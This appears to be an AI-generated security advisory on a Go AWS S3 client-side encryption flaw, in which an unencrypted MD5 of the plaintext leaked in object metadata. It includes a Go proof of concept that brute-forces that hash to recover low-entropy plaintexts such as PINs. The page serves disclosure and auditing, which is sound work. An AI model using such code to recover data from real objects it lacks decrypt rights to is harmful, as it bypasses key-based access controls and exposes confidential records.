
GHSA-76wf-9vgp-pj7w
vulnerability analysis and mitigation

Overview

The AWS S3 Crypto SDK for Go (github.com/aws/aws-sdk-go/service/s3/s3crypto) was affected by a vulnerability, reported by Google Security Research in August 2020, that could result in loss of confidentiality. Tracked as GHSA-76wf-9vgp-pj7w, it affected versions of the SDK prior to 1.34.0. The client stored an unencrypted MD5 hash of the plaintext next to the ciphertext, so an attacker with read access to an encrypted S3 object could recover its plaintext by guessing and hashing candidates, without ever obtaining the data key or calling KMS (Google Security Research).

Technical details

The vulnerability stemmed from the s3crypto encryption client computing an MD5 hash over the plaintext while encrypting and storing it, unencrypted, as a user-metadata field on the S3 object alongside the ciphertext and the wrapped data key. S3 returns user metadata to anyone who can GET or HEAD the object, so the hash was exposed as the X-Amz-Meta-X-Amz-Unencrypted-Content-Md5 response header. Because MD5 of the plaintext depends on the plaintext alone, an attacker could enumerate candidate plaintexts offline, hash each one and stop at the match; no interaction with the decryption key or with KMS was needed. The attack was practical wherever the plaintext was short or low-entropy (PINs, account numbers, names, enumerable records), and precomputed rainbow tables made it cheaper still when the attacker could model the data well enough to build them (Google Security Research).

Impact

The vulnerability posed an insider risk and a form of privilege escalation, because it circumvented the KMS controls on stored data: a principal with read access to the bucket but without decrypt permission on the KMS key is normally unable to read client-side-encrypted objects, yet with the hash present such a principal could recover low-entropy plaintext from S3 read access alone. The attack is cheaper than attacking the cipher whenever the plaintext entropy is below the key size: guessing the plaintext costs on the order of 2^H MD5 evaluations for H bits of plaintext entropy, against 2^k for a k-bit data key, and real records typically carry far fewer bits than the key. It was therefore most impactful for short plaintexts and for data the attacker could characterise well enough to build rainbow tables (Google Security Research).
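To make the attack described in the technical details and impact sections concrete, the following Go program is an added example written for this page; it is not code from the AWS SDK or from the Google Security Research advisory. It takes an object's user metadata as a HEAD Object call would return it (constructed inline here, with the hash stored as lowercase hex, which is an assumption of the example), picks out the leaked x-amz-unencrypted-content-md5 value, and recovers the plaintext by hashing candidates offline, first over a 4-digit PIN space and then over a small word list. The same lookup doubles as an audit check for objects that still carry the field. All function names are the example's own.

```go
package main

import (
	"bytes"
	"crypto/md5"
	"encoding/hex"
	"fmt"
	"strings"
)

// unencryptedMD5Key is the user-metadata key the pre-1.34.0 s3crypto client
// wrote next to the ciphertext. S3 hands it back to any reader as the HTTP
// header X-Amz-Meta-X-Amz-Unencrypted-Content-Md5.
const unencryptedMD5Key = "x-amz-unencrypted-content-md5"

// leakedPlaintextMD5 returns the leaked hash from an object's user metadata.
// The key is matched case-insensitively because SDKs canonicalise header
// names (e.g. "X-Amz-Unencrypted-Content-Md5") on the way back. A true
// result also flags the object as one that still needs attention in an audit.
func leakedPlaintextMD5(meta map[string]string) (string, bool) {
	for k, v := range meta {
		if strings.EqualFold(k, unencryptedMD5Key) {
			return v, true
		}
	}
	return "", false
}

// md5Hex hashes data the way the vulnerable client did (hex encoding assumed).
func md5Hex(data []byte) string {
	sum := md5.Sum(data)
	return hex.EncodeToString(sum[:])
}

// bruteForce pulls candidates from next until one hashes to the leaked value.
// Nothing here touches the ciphertext, the IV or the KMS-wrapped key: the hash
// alone is enough. It returns the plaintext, the number of MD5 evaluations
// spent, and whether a match was found.
func bruteForce(leakedHex string, next func() ([]byte, bool)) ([]byte, int, bool) {
	target, err := hex.DecodeString(leakedHex)
	if err != nil || len(target) != md5.Size {
		return nil, 0, false // not a well-formed MD5 hex digest
	}
	tries := 0
	for {
		cand, ok := next()
		if !ok {
			return nil, tries, false // candidate space exhausted
		}
		tries++
		sum := md5.Sum(cand)
		if bytes.Equal(sum[:], target) {
			return cand, tries, true
		}
	}
}

// digitCandidates enumerates every n-digit string "00...0" through "99...9":
// 10^n guesses, versus 2^256 to attack a 256-bit data key directly.
func digitCandidates(n int) func() ([]byte, bool) {
	limit := 1
	for i := 0; i < n; i++ {
		limit *= 10
	}
	i := 0
	return func() ([]byte, bool) {
		if i >= limit {
			return nil, false
		}
		s := fmt.Sprintf("%0*d", n, i)
		i++
		return []byte(s), true
	}
}

// dictCandidates walks a word list, the precomputed-table style of attack
// against plaintexts an attacker can model (names, common values).
func dictCandidates(words []string) func() ([]byte, bool) {
	i := 0
	return func() ([]byte, bool) {
		if i >= len(words) {
			return nil, false
		}
		w := words[i]
		i++
		return []byte(w), true
	}
}

func main() {
	// Constructed sample: metadata as HEAD Object would return it for an
	// object the vulnerable client wrote while encrypting the PIN "4271".
	// The wrapped key and IV are placeholders; the attack never reads them.
	meta := map[string]string{
		"X-Amz-Key-V2":                  "<KMS-wrapped data key, not needed>",
		"X-Amz-Iv":                      "<IV, not needed>",
		"X-Amz-Cek-Alg":                 "AES/GCM/NoPadding",
		"X-Amz-Unencrypted-Content-Md5": md5Hex([]byte("4271")),
	}
	leaked, ok := leakedPlaintextMD5(meta)
	if !ok {
		fmt.Println("object does not carry the leaked hash")
		return
	}
	pt, tries, found := bruteForce(leaked, digitCandidates(4))
	fmt.Printf("found=%v plaintext=%q after %d MD5 evaluations\n", found, pt, tries)
}
```

The PIN falls after a few thousand MD5 evaluations, and a dictionary of plausible values does the same for free-text fields; the key size never enters the cost. Running leakedPlaintextMD5 over the metadata of every object in a bucket is the cheapest way to confirm that none still expose the field.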

Mitigation and workarounds

AWS fully mitigated the issue on August 5th, 2020 by blocking the vulnerable metadata field server-side, so the plaintext hash is no longer served for any S3 object regardless of which client wrote it. Independently, version 1.34.0 of the AWS SDK for Go removed the computation of the hash, so a patched client never writes the field; users of s3crypto should upgrade to 1.34.0 or later (Google Security Research, Go Vulnerability Database).

This report was generated using AI.
